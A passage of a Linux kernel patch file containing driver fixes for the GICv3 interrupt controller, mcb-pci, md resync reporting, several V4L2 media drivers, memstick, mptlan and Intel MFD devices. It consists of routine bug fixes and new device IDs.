++static int __init gic_init_bases(phys_addr_t dist_phys_base,
++				 void __iomem *dist_base,
+ 				 struct redist_region *rdist_regs,
+ 				 u32 nr_redist_regions,
+ 				 u64 redist_stride,
+@@ -1832,6 +1917,7 @@ static int __init gic_init_bases(void __iomem *dist_base,
+ 		pr_info("GIC: Using split EOI/Deactivate mode\n");
+ 
+ 	gic_data.fwnode = handle;
++	gic_data.dist_phys_base = dist_phys_base;
+ 	gic_data.dist_base = dist_base;
+ 	gic_data.redist_regions = rdist_regs;
+ 	gic_data.nr_redist_regions = nr_redist_regions;
+@@ -1859,10 +1945,13 @@ static int __init gic_init_bases(void __iomem *dist_base,
+ 	gic_data.domain = irq_domain_create_tree(handle, &gic_irq_domain_ops,
+ 						 &gic_data);
+ 	gic_data.rdists.rdist = alloc_percpu(typeof(*gic_data.rdists.rdist));
+-	gic_data.rdists.has_rvpeid = true;
+-	gic_data.rdists.has_vlpis = true;
+-	gic_data.rdists.has_direct_lpi = true;
+-	gic_data.rdists.has_vpend_valid_dirty = true;
++	if (!static_branch_unlikely(&gic_nvidia_t241_erratum)) {
++		/* Disable GICv4.x features for the erratum T241-FABRIC-4 */
++		gic_data.rdists.has_rvpeid = true;
++		gic_data.rdists.has_vlpis = true;
++		gic_data.rdists.has_direct_lpi = true;
++		gic_data.rdists.has_vpend_valid_dirty = true;
++	}
+ 
+ 	if (WARN_ON(!gic_data.domain) || WARN_ON(!gic_data.rdists.rdist)) {
+ 		err = -ENOMEM;
+@@ -2068,6 +2157,7 @@ static void __iomem *gic_of_iomap(struct device_node *node, int idx,
+ 
+ static int __init gic_of_init(struct device_node *node, struct device_node *parent)
+ {
++	phys_addr_t dist_phys_base;
+ 	void __iomem *dist_base;
+ 	struct redist_region *rdist_regs;
+ 	struct resource res;
+@@ -2081,6 +2171,8 @@ static int __init gic_of_init(struct device_node *node, struct device_node *pare
+ 		return PTR_ERR(dist_base);
+ 	}
+ 
++	dist_phys_base = res.start;
++
+ 	err = gic_validate_dist_version(dist_base);
+ 	if (err) {
+ 		pr_err("%pOF: no distributor detected, giving up\n", node);
+@@ -2112,8 +2204,8 @@ static int __init gic_of_init(struct device_node *node, struct device_node *pare
+ 
+ 	gic_enable_of_quirks(node, gic_quirks, &gic_data);
+ 
+-	err = gic_init_bases(dist_base, rdist_regs, nr_redist_regions,
+-			     redist_stride, &node->fwnode);
++	err = gic_init_bases(dist_phys_base, dist_base, rdist_regs,
++			     nr_redist_regions, redist_stride, &node->fwnode);
+ 	if (err)
+ 		goto out_unmap_rdist;
+ 
+@@ -2429,8 +2521,9 @@ gic_acpi_init(union acpi_subtable_headers *header, const unsigned long end)
+ 		goto out_redist_unmap;
+ 	}
+ 
+-	err = gic_init_bases(acpi_data.dist_base, acpi_data.redist_regs,
+-			     acpi_data.nr_redist_regions, 0, gsi_domain_handle);
++	err = gic_init_bases(dist->base_address, acpi_data.dist_base,
++			     acpi_data.redist_regs, acpi_data.nr_redist_regions,
++			     0, gsi_domain_handle);
+ 	if (err)
+ 		goto out_fwhandle_free;
+ 
+diff --git a/drivers/mcb/mcb-pci.c b/drivers/mcb/mcb-pci.c
+index dc88232d9af83..53d9202ff9a7c 100644
+--- a/drivers/mcb/mcb-pci.c
++++ b/drivers/mcb/mcb-pci.c
+@@ -31,7 +31,7 @@ static int mcb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct resource *res;
+ 	struct priv *priv;
+-	int ret;
++	int ret, table_size;
+ 	unsigned long flags;
+ 
+ 	priv = devm_kzalloc(&pdev->dev, sizeof(struct priv), GFP_KERNEL);
+@@ -90,7 +90,30 @@ static int mcb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (ret < 0)
+ 		goto out_mcb_bus;
+ 
+-	dev_dbg(&pdev->dev, "Found %d cells\n", ret);
++	table_size = ret;
++
++	if (table_size < CHAM_HEADER_SIZE) {
++		/* Release the previous resources */
++		devm_iounmap(&pdev->dev, priv->base);
++		devm_release_mem_region(&pdev->dev, priv->mapbase, CHAM_HEADER_SIZE);
++
++		/* Then, allocate it again with the actual chameleon table size */
++		res = devm_request_mem_region(&pdev->dev, priv->mapbase,
++						table_size,
++						KBUILD_MODNAME);
++		if (!res) {
++			dev_err(&pdev->dev, "Failed to request PCI memory\n");
++			ret = -EBUSY;
++			goto out_mcb_bus;
++		}
++
++		priv->base = devm_ioremap(&pdev->dev, priv->mapbase, table_size);
++		if (!priv->base) {
++			dev_err(&pdev->dev, "Cannot ioremap\n");
++			ret = -ENOMEM;
++			goto out_mcb_bus;
++		}
++	}
+ 
+ 	mcb_bus_add_devices(priv->bus);
+ 
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index d5c362b1602b6..bb73a541bb193 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -8028,16 +8028,16 @@ static int status_resync(struct seq_file *seq, struct mddev *mddev)
+ 	} else if (resync > max_sectors) {
+ 		resync = max_sectors;
+ 	} else {
+-		resync -= atomic_read(&mddev->recovery_active);
+-		if (resync < MD_RESYNC_ACTIVE) {
+-			/*
+-			 * Resync has started, but the subtraction has
+-			 * yielded one of the special values. Force it
+-			 * to active to ensure the status reports an
+-			 * active resync.
+-			 */
++		res = atomic_read(&mddev->recovery_active);
++		/*
++		 * Resync has started, but the subtraction has overflowed or
++		 * yielded one of the special values. Force it to active to
++		 * ensure the status reports an active resync.
++		 */
++		if (resync < res || resync - res < MD_RESYNC_ACTIVE)
+ 			resync = MD_RESYNC_ACTIVE;
+-		}
++		else
++			resync -= res;
+ 	}
+ 
+ 	if (resync == MD_RESYNC_NONE) {
+diff --git a/drivers/media/pci/cx23885/cx23885-core.c b/drivers/media/pci/cx23885/cx23885-core.c
+index 9232a966bcabb..2ce2914576cf2 100644
+--- a/drivers/media/pci/cx23885/cx23885-core.c
++++ b/drivers/media/pci/cx23885/cx23885-core.c
+@@ -1325,7 +1325,9 @@ void cx23885_free_buffer(struct cx23885_dev *dev, struct cx23885_buffer *buf)
+ {
+ 	struct cx23885_riscmem *risc = &buf->risc;
+ 
+-	dma_free_coherent(&dev->pci->dev, risc->size, risc->cpu, risc->dma);
++	if (risc->cpu)
++		dma_free_coherent(&dev->pci->dev, risc->size, risc->cpu, risc->dma);
++	memset(risc, 0, sizeof(*risc));
+ }
+ 
+ static void cx23885_tsport_reg_dump(struct cx23885_tsport *port)
+diff --git a/drivers/media/pci/cx23885/cx23885-video.c b/drivers/media/pci/cx23885/cx23885-video.c
+index 3d03f5e95786a..671fc0588e431 100644
+--- a/drivers/media/pci/cx23885/cx23885-video.c
++++ b/drivers/media/pci/cx23885/cx23885-video.c
+@@ -342,6 +342,7 @@ static int queue_setup(struct vb2_queue *q,
+ 
+ static int buffer_prepare(struct vb2_buffer *vb)
+ {
++	int ret;
+ 	struct vb2_v4l2_buffer *vbuf = to_vb2_v4l2_buffer(vb);
+ 	struct cx23885_dev *dev = vb->vb2_queue->drv_priv;
+ 	struct cx23885_buffer *buf =
+@@ -358,12 +359,12 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 
+ 	switch (dev->field) {
+ 	case V4L2_FIELD_TOP:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl, 0, UNSET,
+ 				buf->bpl, 0, dev->height);
+ 		break;
+ 	case V4L2_FIELD_BOTTOM:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl, UNSET, 0,
+ 				buf->bpl, 0, dev->height);
+ 		break;
+@@ -391,21 +392,21 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 			line0_offset = 0;
+ 			line1_offset = buf->bpl;
+ 		}
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl, line0_offset,
+ 				line1_offset,
+ 				buf->bpl, buf->bpl,
+ 				dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_SEQ_TB:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl,
+ 				0, buf->bpl * (dev->height >> 1),
+ 				buf->bpl, 0,
+ 				dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_SEQ_BT:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl,
+ 				buf->bpl * (dev->height >> 1), 0,
+ 				buf->bpl, 0,
+@@ -418,7 +419,7 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 		buf, buf->vb.vb2_buf.index,
+ 		dev->width, dev->height, dev->fmt->depth, dev->fmt->fourcc,
+ 		(unsigned long)buf->risc.dma);
+-	return 0;
++	return ret;
+ }
+ 
+ static void buffer_finish(struct vb2_buffer *vb)
+diff --git a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+index 8287851b5ffdc..aaa1d2dedebdd 100644
+--- a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
++++ b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+@@ -697,7 +697,7 @@ static void netup_unidvb_dma_fini(struct netup_unidvb_dev *ndev, int num)
+ 	netup_unidvb_dma_enable(dma, 0);
+ 	msleep(50);
+ 	cancel_work_sync(&dma->work);
+-	del_timer(&dma->timeout);
++	del_timer_sync(&dma->timeout);
+ }
+ 
+ static int netup_unidvb_dma_setup(struct netup_unidvb_dev *ndev)
+diff --git a/drivers/media/pci/tw68/tw68-video.c b/drivers/media/pci/tw68/tw68-video.c
+index 0cbc5b038073b..773a18702d369 100644
+--- a/drivers/media/pci/tw68/tw68-video.c
++++ b/drivers/media/pci/tw68/tw68-video.c
+@@ -437,6 +437,7 @@ static void tw68_buf_queue(struct vb2_buffer *vb)
+  */
+ static int tw68_buf_prepare(struct vb2_buffer *vb)
+ {
++	int ret;
+ 	struct vb2_v4l2_buffer *vbuf = to_vb2_v4l2_buffer(vb);
+ 	struct vb2_queue *vq = vb->vb2_queue;
+ 	struct tw68_dev *dev = vb2_get_drv_priv(vq);
+@@ -452,30 +453,30 @@ static int tw68_buf_prepare(struct vb2_buffer *vb)
+ 	bpl = (dev->width * dev->fmt->depth) >> 3;
+ 	switch (dev->field) {
+ 	case V4L2_FIELD_TOP:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 0, UNSET, bpl, 0, dev->height);
+ 		break;
+ 	case V4L2_FIELD_BOTTOM:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 UNSET, 0, bpl, 0, dev->height);
+ 		break;
+ 	case V4L2_FIELD_SEQ_TB:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 0, bpl * (dev->height >> 1),
+ 				 bpl, 0, dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_SEQ_BT:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 bpl * (dev->height >> 1), 0,
+ 				 bpl, 0, dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_INTERLACED:
+ 	default:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 0, bpl, bpl, bpl, dev->height >> 1);
+ 		break;
+ 	}
+-	return 0;
++	return ret;
+ }
+ 
+ static void tw68_buf_finish(struct vb2_buffer *vb)
+@@ -485,7 +486,8 @@ static void tw68_buf_finish(struct vb2_buffer *vb)
+ 	struct tw68_dev *dev = vb2_get_drv_priv(vq);
+ 	struct tw68_buf *buf = container_of(vbuf, struct tw68_buf, vb);
+ 
+-	dma_free_coherent(&dev->pci->dev, buf->size, buf->cpu, buf->dma);
++	if (buf->cpu)
++		dma_free_coherent(&dev->pci->dev, buf->size, buf->cpu, buf->dma);
+ }
+ 
+ static int tw68_start_streaming(struct vb2_queue *q, unsigned int count)
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+index c99705681a03e..93fcea821001f 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+@@ -735,6 +735,13 @@ int vb2ops_vdec_queue_setup(struct vb2_queue *vq, unsigned int *nbuffers,
+ 	}
+ 
+ 	if (*nplanes) {
++		if (vq->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
++			if (*nplanes != q_data->fmt->num_planes)
++				return -EINVAL;
++		} else {
++			if (*nplanes != 1)
++				return -EINVAL;
++		}
+ 		for (i = 0; i < *nplanes; i++) {
+ 			if (sizes[i] < q_data->sizeimage[i])
+ 				return -EINVAL;
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_drm.c b/drivers/media/platform/renesas/vsp1/vsp1_drm.c
+index c6f25200982c8..7fe375b6322cd 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_drm.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_drm.c
+@@ -66,7 +66,9 @@ static int vsp1_du_insert_uif(struct vsp1_device *vsp1,
+ 			      struct vsp1_entity *prev, unsigned int prev_pad,
+ 			      struct vsp1_entity *next, unsigned int next_pad)
+ {
+-	struct v4l2_subdev_format format;
++	struct v4l2_subdev_format format = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	int ret;
+ 
+ 	if (!uif) {
+@@ -82,8 +84,6 @@ static int vsp1_du_insert_uif(struct vsp1_device *vsp1,
+ 	prev->sink = uif;
+ 	prev->sink_pad = UIF_PAD_SINK;
+ 
+-	memset(&format, 0, sizeof(format));
+-	format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	format.pad = prev_pad;
+ 
+ 	ret = v4l2_subdev_call(&prev->subdev, pad, get_fmt, NULL, &format);
+@@ -118,8 +118,12 @@ static int vsp1_du_pipeline_setup_rpf(struct vsp1_device *vsp1,
+ 				      struct vsp1_entity *uif,
+ 				      unsigned int brx_input)
+ {
+-	struct v4l2_subdev_selection sel;
+-	struct v4l2_subdev_format format;
++	struct v4l2_subdev_selection sel = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
++	struct v4l2_subdev_format format = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	const struct v4l2_rect *crop;
+ 	int ret;
+ 
+@@ -129,8 +133,6 @@ static int vsp1_du_pipeline_setup_rpf(struct vsp1_device *vsp1,
+ 	 */
+ 	crop = &vsp1->drm->inputs[rpf->entity.index].crop;
+ 
+-	memset(&format, 0, sizeof(format));
+-	format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	format.pad = RWPF_PAD_SINK;
+ 	format.format.width = crop->width + crop->left;
+ 	format.format.height = crop->height + crop->top;
+@@ -147,8 +149,6 @@ static int vsp1_du_pipeline_setup_rpf(struct vsp1_device *vsp1,
+ 		__func__, format.format.width, format.format.height,
+ 		format.format.code, rpf->entity.index);
+ 
+-	memset(&sel, 0, sizeof(sel));
+-	sel.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	sel.pad = RWPF_PAD_SINK;
+ 	sel.target = V4L2_SEL_TGT_CROP;
+ 	sel.r = *crop;
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_entity.c b/drivers/media/platform/renesas/vsp1/vsp1_entity.c
+index 4c3bd2b1ca287..c31f05a80bb56 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_entity.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_entity.c
+@@ -184,15 +184,14 @@ vsp1_entity_get_pad_selection(struct vsp1_entity *entity,
+ int vsp1_entity_init_cfg(struct v4l2_subdev *subdev,
+ 			 struct v4l2_subdev_state *sd_state)
+ {
+-	struct v4l2_subdev_format format;
+ 	unsigned int pad;
+ 
+ 	for (pad = 0; pad < subdev->entity.num_pads - 1; ++pad) {
+-		memset(&format, 0, sizeof(format));
+-
+-		format.pad = pad;
+-		format.which = sd_state ? V4L2_SUBDEV_FORMAT_TRY
+-			     : V4L2_SUBDEV_FORMAT_ACTIVE;
++		struct v4l2_subdev_format format = {
++			.pad = pad,
++			.which = sd_state ? V4L2_SUBDEV_FORMAT_TRY
++			       : V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
+ 
+ 		v4l2_subdev_call(subdev, pad, set_fmt, sd_state, &format);
+ 	}
+diff --git a/drivers/media/platform/samsung/exynos4-is/fimc-capture.c b/drivers/media/platform/samsung/exynos4-is/fimc-capture.c
+index e3b95a2b7e040..beaee54ee73bf 100644
+--- a/drivers/media/platform/samsung/exynos4-is/fimc-capture.c
++++ b/drivers/media/platform/samsung/exynos4-is/fimc-capture.c
+@@ -763,7 +763,10 @@ static int fimc_pipeline_try_format(struct fimc_ctx *ctx,
+ 	struct fimc_dev *fimc = ctx->fimc_dev;
+ 	struct fimc_pipeline *p = to_fimc_pipeline(fimc->vid_cap.ve.pipe);
+ 	struct v4l2_subdev *sd = p->subdevs[IDX_SENSOR];
+-	struct v4l2_subdev_format sfmt;
++	struct v4l2_subdev_format sfmt = {
++		.which = set ? V4L2_SUBDEV_FORMAT_ACTIVE
++		       : V4L2_SUBDEV_FORMAT_TRY,
++	};
+ 	struct v4l2_mbus_framefmt *mf = &sfmt.format;
+ 	struct media_entity *me;
+ 	struct fimc_fmt *ffmt;
+@@ -774,9 +777,7 @@ static int fimc_pipeline_try_format(struct fimc_ctx *ctx,
+ 	if (WARN_ON(!sd || !tfmt))
+ 		return -EINVAL;
+ 
+-	memset(&sfmt, 0, sizeof(sfmt));
+ 	sfmt.format = *tfmt;
+-	sfmt.which = set ? V4L2_SUBDEV_FORMAT_ACTIVE : V4L2_SUBDEV_FORMAT_TRY;
+ 
+ 	me = fimc_pipeline_get_head(&sd->entity);
+ 
+diff --git a/drivers/media/platform/ti/am437x/am437x-vpfe.c b/drivers/media/platform/ti/am437x/am437x-vpfe.c
+index 2dfae9bc0bba8..dffac89cbd210 100644
+--- a/drivers/media/platform/ti/am437x/am437x-vpfe.c
++++ b/drivers/media/platform/ti/am437x/am437x-vpfe.c
+@@ -1499,7 +1499,9 @@ static int vpfe_enum_size(struct file *file, void  *priv,
+ 			  struct v4l2_frmsizeenum *fsize)
+ {
+ 	struct vpfe_device *vpfe = video_drvdata(file);
+-	struct v4l2_subdev_frame_size_enum fse;
++	struct v4l2_subdev_frame_size_enum fse = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	struct v4l2_subdev *sd = vpfe->current_subdev->sd;
+ 	struct vpfe_fmt *fmt;
+ 	int ret;
+@@ -1514,11 +1516,9 @@ static int vpfe_enum_size(struct file *file, void  *priv,
+ 
+ 	memset(fsize->reserved, 0x0, sizeof(fsize->reserved));
+ 
+-	memset(&fse, 0x0, sizeof(fse));
+ 	fse.index = fsize->index;
+ 	fse.pad = 0;
+ 	fse.code = fmt->code;
+-	fse.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	ret = v4l2_subdev_call(sd, pad, enum_frame_size, NULL, &fse);
+ 	if (ret)
+ 		return ret;
+@@ -2146,7 +2146,6 @@ vpfe_async_bound(struct v4l2_async_notifier *notifier,
+ {
+ 	struct vpfe_device *vpfe = container_of(notifier->v4l2_dev,
+ 					       struct vpfe_device, v4l2_dev);
+-	struct v4l2_subdev_mbus_code_enum mbus_code;
+ 	struct vpfe_subdev_info *sdinfo;
+ 	struct vpfe_fmt *fmt;
+ 	int ret = 0;
+@@ -2173,9 +2172,11 @@ vpfe_async_bound(struct v4l2_async_notifier *notifier,
+ 
+ 	vpfe->num_active_fmt = 0;
+ 	for (j = 0, i = 0; (ret != -EINVAL); ++j) {
+-		memset(&mbus_code, 0, sizeof(mbus_code));
+-		mbus_code.index = j;
+-		mbus_code.which = V4L2_SUBDEV_FORMAT_ACTIVE;
++		struct v4l2_subdev_mbus_code_enum mbus_code = {
++			.index = j,
++			.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
++
+ 		ret = v4l2_subdev_call(subdev, pad, enum_mbus_code,
+ 				       NULL, &mbus_code);
+ 		if (ret)
+diff --git a/drivers/media/platform/ti/cal/cal-video.c b/drivers/media/platform/ti/cal/cal-video.c
+index 4eade409d5d36..bbfd2719725aa 100644
+--- a/drivers/media/platform/ti/cal/cal-video.c
++++ b/drivers/media/platform/ti/cal/cal-video.c
+@@ -811,7 +811,6 @@ static const struct v4l2_file_operations cal_fops = {
+ 
+ static int cal_ctx_v4l2_init_formats(struct cal_ctx *ctx)
+ {
+-	struct v4l2_subdev_mbus_code_enum mbus_code;
+ 	struct v4l2_mbus_framefmt mbus_fmt;
+ 	const struct cal_format_info *fmtinfo;
+ 	unsigned int i, j, k;
+@@ -826,10 +825,11 @@ static int cal_ctx_v4l2_init_formats(struct cal_ctx *ctx)
+ 	ctx->num_active_fmt = 0;
+ 
+ 	for (j = 0, i = 0; ; ++j) {
++		struct v4l2_subdev_mbus_code_enum mbus_code = {
++			.index = j,
++			.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
+ 
+-		memset(&mbus_code, 0, sizeof(mbus_code));
+-		mbus_code.index = j;
+-		mbus_code.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 		ret = v4l2_subdev_call(ctx->phy->source, pad, enum_mbus_code,
+ 				       NULL, &mbus_code);
+ 		if (ret == -EINVAL)
+diff --git a/drivers/media/usb/dvb-usb/cxusb-analog.c b/drivers/media/usb/dvb-usb/cxusb-analog.c
+index e93183ddd7975..deba5224cb8df 100644
+--- a/drivers/media/usb/dvb-usb/cxusb-analog.c
++++ b/drivers/media/usb/dvb-usb/cxusb-analog.c
+@@ -1014,7 +1014,10 @@ static int cxusb_medion_try_s_fmt_vid_cap(struct file *file,
+ {
+ 	struct dvb_usb_device *dvbdev = video_drvdata(file);
+ 	struct cxusb_medion_dev *cxdev = dvbdev->priv;
+-	struct v4l2_subdev_format subfmt;
++	struct v4l2_subdev_format subfmt = {
++		.which = isset ? V4L2_SUBDEV_FORMAT_ACTIVE :
++			 V4L2_SUBDEV_FORMAT_TRY,
++	};
+ 	u32 field;
+ 	int ret;
+ 
+@@ -1024,9 +1027,6 @@ static int cxusb_medion_try_s_fmt_vid_cap(struct file *file,
+ 	field = vb2_start_streaming_called(&cxdev->videoqueue) ?
+ 		cxdev->field_order : cxusb_medion_field_order(cxdev);
+ 
+-	memset(&subfmt, 0, sizeof(subfmt));
+-	subfmt.which = isset ? V4L2_SUBDEV_FORMAT_ACTIVE :
+-		V4L2_SUBDEV_FORMAT_TRY;
+ 	subfmt.format.width = f->fmt.pix.width & ~1;
+ 	subfmt.format.height = f->fmt.pix.height & ~1;
+ 	subfmt.format.code = MEDIA_BUS_FMT_FIXED;
+@@ -1464,7 +1464,9 @@ int cxusb_medion_analog_init(struct dvb_usb_device *dvbdev)
+ 					    .buf = tuner_analog_msg_data,
+ 					    .len =
+ 					    sizeof(tuner_analog_msg_data) };
+-	struct v4l2_subdev_format subfmt;
++	struct v4l2_subdev_format subfmt = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	int ret;
+ 
+ 	/* switch tuner to analog mode so IF demod will become accessible */
+@@ -1507,8 +1509,6 @@ int cxusb_medion_analog_init(struct dvb_usb_device *dvbdev)
+ 	v4l2_subdev_call(cxdev->tuner, video, s_std, cxdev->norm);
+ 	v4l2_subdev_call(cxdev->cx25840, video, s_std, cxdev->norm);
+ 
+-	memset(&subfmt, 0, sizeof(subfmt));
+-	subfmt.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	subfmt.format.width = cxdev->width;
+ 	subfmt.format.height = cxdev->height;
+ 	subfmt.format.code = MEDIA_BUS_FMT_FIXED;
+diff --git a/drivers/media/usb/pvrusb2/Kconfig b/drivers/media/usb/pvrusb2/Kconfig
+index f2b64e49c5a20..9501b10b31aa5 100644
+--- a/drivers/media/usb/pvrusb2/Kconfig
++++ b/drivers/media/usb/pvrusb2/Kconfig
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ config VIDEO_PVRUSB2
+ 	tristate "Hauppauge WinTV-PVR USB2 support"
+-	depends on VIDEO_DEV && I2C
++	depends on VIDEO_DEV && I2C && DVB_CORE
+ 	select VIDEO_TUNER
+ 	select VIDEO_TVEEPROM
+ 	select VIDEO_CX2341X
+diff --git a/drivers/memstick/host/r592.c b/drivers/memstick/host/r592.c
+index 1d35d147552d4..42bfc46842b82 100644
+--- a/drivers/memstick/host/r592.c
++++ b/drivers/memstick/host/r592.c
+@@ -829,7 +829,7 @@ static void r592_remove(struct pci_dev *pdev)
+ 	/* Stop the processing thread.
+ 	That ensures that we won't take any more requests */
+ 	kthread_stop(dev->io_thread);
+-
++	del_timer_sync(&dev->detect_timer);
+ 	r592_enable_device(dev, false);
+ 
+ 	while (!error && dev->req) {
+diff --git a/drivers/message/fusion/mptlan.c b/drivers/message/fusion/mptlan.c
+index 142eb5d5d9df6..de2e7bcf47847 100644
+--- a/drivers/message/fusion/mptlan.c
++++ b/drivers/message/fusion/mptlan.c
+@@ -1433,7 +1433,9 @@ mptlan_remove(struct pci_dev *pdev)
+ {
+ 	MPT_ADAPTER 		*ioc = pci_get_drvdata(pdev);
+ 	struct net_device	*dev = ioc->netdev;
++	struct mpt_lan_priv *priv = netdev_priv(dev);
+ 
++	cancel_delayed_work_sync(&priv->post_buckets_task);
+ 	if(dev != NULL) {
+ 		unregister_netdev(dev);
+ 		free_netdev(dev);
+diff --git a/drivers/mfd/dln2.c b/drivers/mfd/dln2.c
+index 6cd0b0c752d6e..c3149729cec2e 100644
+--- a/drivers/mfd/dln2.c
++++ b/drivers/mfd/dln2.c
+@@ -827,6 +827,7 @@ out_stop_rx:
+ 	dln2_stop_rx_urbs(dln2);
+ 
+ out_free:
++	usb_put_dev(dln2->usb_dev);
+ 	dln2_free(dln2);
+ 
+ 	return ret;
+diff --git a/drivers/mfd/intel-lpss-pci.c b/drivers/mfd/intel-lpss-pci.c
+index dde31c50a6320..699f44ffff0e4 100644
+--- a/drivers/mfd/intel-lpss-pci.c
++++ b/drivers/mfd/intel-lpss-pci.c
+@@ -447,6 +447,21 @@ static const struct pci_device_id intel_lpss_pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x7e79), (kernel_ulong_t)&bxt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7e7a), (kernel_ulong_t)&bxt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7e7b), (kernel_ulong_t)&bxt_i2c_info },
++	/* MTP-S */
++	{ PCI_VDEVICE(INTEL, 0x7f28), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f29), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f2a), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f2b), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4c), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4d), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4e), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f4f), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5c), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5d), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5e), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f5f), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0x7f7a), (kernel_ulong_t)&bxt_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0x7f7b), (kernel_ulong_t)&bxt_i2c_info },
+ 	/* LKF */
+ 	{ PCI_VDEVICE(INTEL, 0x98a8), (kernel_ulong_t)&bxt_uart_info },
+ 	{ PCI_VDEVICE(INTEL, 0x98a9), (kernel_ulong_t)&bxt_uart_info },
+diff --git a/drivers/mfd/intel_soc_pmic_chtwc.c b/drivers/mfd/intel_soc_pmic_chtwc.c
+index 9216f0d34206c..a82b7cb661b7b 100644
+--- a/drivers/mfd/intel_soc_pmic_chtwc.c
++++ b/drivers/mfd/intel_soc_pmic_chtwc.c
+@@ -159,11 +159,19 @@ static const struct dmi_system_id cht_wc_model_dmi_ids[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Mipad2"),
+ 		},
+ 	}, {
+-		/* Lenovo Yoga Book X90F / X91F / X91L */
++		/* Lenovo Yoga Book X90F / X90L */
+ 		.driver_data = (void *)(long)INTEL_CHT_WC_LENOVO_YOGABOOK1,
+ 		.matches = {
+-			/* Non exact match to match all versions */
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9"),
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
